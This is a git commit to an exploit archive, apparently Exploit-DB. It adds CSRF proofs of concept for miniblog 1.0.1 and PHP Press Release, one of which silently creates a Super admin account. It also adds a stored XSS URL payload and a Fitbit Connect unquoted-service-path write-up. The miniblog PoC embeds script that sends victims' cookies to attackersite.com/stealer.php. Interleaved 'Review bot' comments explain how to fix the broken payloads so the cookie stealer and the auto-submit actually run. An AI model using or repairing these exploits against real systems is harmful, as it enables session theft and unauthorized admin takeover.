DB: 2016-10-10
4 new exploits

miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
Fitbit Connect Service - Unquoted Service Path Privilege Escalation
PHP Press Release - Cross-Site Request Forgery (Add Admin)
PHP Press Release - Stored Cross Site Scripting
parent cda049fa54
commit 8ea4614148
5 changed files with 128 additions and 0 deletions
@ -36597,3 +36597,7 @@ id,file,description,date,author,platform,type,port
40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
40482,platforms/windows/local/40482.txt,"Fitbit Connect Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0
40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0
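Review bot: the description for 40486 in this hunk, "PHP Press Release - Cross-Site Request Forgery (Add Admin)", drops the "Super User" qualifier that the exploit file's own title line carries ("Add Admin - Super User"), and 40487 is indexed as "Stored Cross Site Scripting" while the two CSRF rows in the same hunk hyphenate "Cross-Site"; pick one form for both the CSV row and the file header so a search on either string finds the entry. Also worth a line in the commit message: ids 40481 and 40483 through 40485 are skipped in this batch, which is fine if they are pending elsewhere but reads as a gap otherwise.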
platforms/php/webapps/40480.txt (new executable file, +38)
@ -0,0 +1,38 @@
# Exploit Title : miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
# Author : Besim
# Google Dork :
# Date : 09/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.spyka.net/scripts/php/miniblog
# Software link :
http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip


Description (admin login required) :

miniblog 1.0.1 versions is vulnerable to CSRF attack, adding, delete and
edit article in the sections

Vulnerable page : http://localhost:8081/miniblog/*adm/admin.php?mode=add

Dangerous point : if used with XSS can be steal on the admin's cookie information.


*############### CSRF PoC ###############*


<html> <!-- CSRF PoC --> <body> <form action="
http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:\xampp\htdocs\miniblog\adm\edit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E"
method="POST"> <input type="hidden" name="data[post_title]"
value="<script>location.href = ‘http://www.attackersite.com/stealer.php?cookie=’+document.cookie;</script>"
/> <input type="hidden" name="data[post_content]"
value="tester" /> <input type="hidden" name="data[published]"
value="1" /> <input type="hidden" name="miniblog_PostBack" value="Add"
/> <input type="submit" value="Submit request" /> </form> <script>
document.forms[0].submit(); </script> </body> </html>



########################################

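Review bot: the form action in the PoC is broken as committed: the id parameter is the URL-encoded text of a PHP notice from the author's XAMPP install ("Undefined variable: post in C:\xampp\htdocs\miniblog\adm\edit.php on line 8"), not a post id, and the payload line uses curly quotes (‘http://www.attackersite.com/stealer.php?cookie=’) inside the JavaScript string, which is a syntax error once the stored script runs. Point the action at the path given under "Vulnerable page" (adm/admin.php?mode=add, without the stray asterisk in "*adm/") and use straight quotes. The description also claims add, delete and edit are all forgeable, but the PoC only exercises mode=add; either include the delete/edit requests or narrow the claim to match the title. Finally, the Google Dork field is empty and the HTML has been run together onto long lines; one tag per line, as in 40486, makes the forged request readable.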
platforms/php/webapps/40486.txt (new executable file, +35)
@ -0,0 +1,35 @@
# Exploit Title : PHP Press Release - Cross-Site Request Forgery (Add Admin - Super User )
# Author : Besim
# Google Dork : -
# Date : 09/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.pagereactions.com/product.php?pku=1
Software link :
http://www.pagereactions.com/downloads/phppressrelease.zip



########################### CSRF PoC ###############################


<html>
<!-- CSRF PoC -->
<body>
<form action="http://sitename/phppressrelease/administration.php" method="POST">
<input type="hidden" name="pageaction" value="saveuser" />
<input type="hidden" name="subaction" value="submit" />
<input type="hidden" name="username" value="murat" />
<input type="hidden" name="password" value="murat" />
<input type="hidden" name="userfullname" value="murat tester" />
<input type="hidden" name="accesslevel" value="Super" />
<input type="hidden" name="userstatus" value="active" />
<input type="submit" value="Submit request" />
</form>
<script>
*document.forms[0].submit();*
</script>
</body>
</html>

####################################################################
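Review bot: the submit call on the line `*document.forms[0].submit();*` is wrapped in asterisks (bold markup that survived from the submission), so the script block throws a syntax error and the form is never auto-submitted; strip them. The file also has no Description section: nothing says which request lacks an anti-CSRF token, that the victim must hold an authenticated administrator session on administration.php (the miniblog entry in this same commit at least notes "admin login required"), or which version was tested. The "Software link :" line is missing the leading "#" that every other header field in the file uses, and the trailing space in "Super User )" in the title should go.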
platforms/php/webapps/40487.txt (new executable file, +22)
@ -0,0 +1,22 @@
# Exploit Title : PHP Press Release* - Stored Cross Site
Scripting*
# Author : Besim
# Google Dork : -
# Date : 09/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.pagereactions.com/product.php?pku=1
# Software link :
http://www.pagereactions.com/downloads/phppressrelease.zip


Description :

Vulnerable link :
http://site_name/phppressrelease/administration.php?pageaction=newrelease

Stored XSS Payload :

http://www.site_name/phppressrelease/administration.php?pageaction=saverelease&subaction=submit&dateday=&datemonthnewedit=&dateyearnewedit=&title=<script>alert('Exploit-DB')<%2Fscript>&summary=deneme&releasebody=deneme&categorynewedit=1&publish=active


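Review bot: the "Description :" heading is empty, and the "Vulnerable link" (pageaction=newrelease) is not the request the payload sends (pageaction=saverelease&subaction=submit), so state which request stores the title and where it is rendered back (release listing, admin list, public page). The title line is split across two lines with stray asterisks ("PHP Press Release* - Stored Cross Site" / "Scripting*"); it should be a single line matching the files.csv row. The payload URL encodes only the closing-tag slash (%2F) while leaving <, >, ' and ( raw, which browsers tolerate but which makes copy-paste fragile; encode it consistently. If saverelease really accepts this as a GET with no token, the same URL is also a CSRF vector and deserves a sentence alongside 40486.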
platforms/windows/local/40482.txt (new executable file, +29)
@ -0,0 +1,29 @@
Fitbit Connect Service: https://www.fitbit.com/
By Ross Marks: http://www.rossmarks.co.uk
Exploit-db: https://www.exploit-db.com/author/?a=8724
Category: Local
Tested on: Windows 10 x86/x64

1) Unquoted Service Path Privilege Escalation

Fitbit connect installs as a service with an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.

A successful attempt would require the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.

PoC:

C:\>sc qc "Fitbit Connect"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Fitbit Connect
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Fitbit Connect Service
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\NetworkService
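Review bot: the description says the service runs "with SYSTEM privileges", but the sc qc output in the same hunk shows SERVICE_START_NAME : NT AUTHORITY\NetworkService; the text should say NetworkService (still a boundary crossing from a standard user, but not SYSTEM, and the impact statement should be toned down to match). The write-up also never shows that any prefix of the unquoted path is writable by a non-privileged user: for C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe the candidate drop points are C:\Program.exe and C:\Program Files (x86)\Fitbit.exe, and on a default Windows 10 install standard users cannot create files in C:\ or anywhere under Program Files (x86), so the claim needs icacls output for those directories or an explicit caveat that a writable directory is a precondition. Minor: "localuser" should be "local user", and "would require the local attacker must insert" should read "requires the local attacker to place".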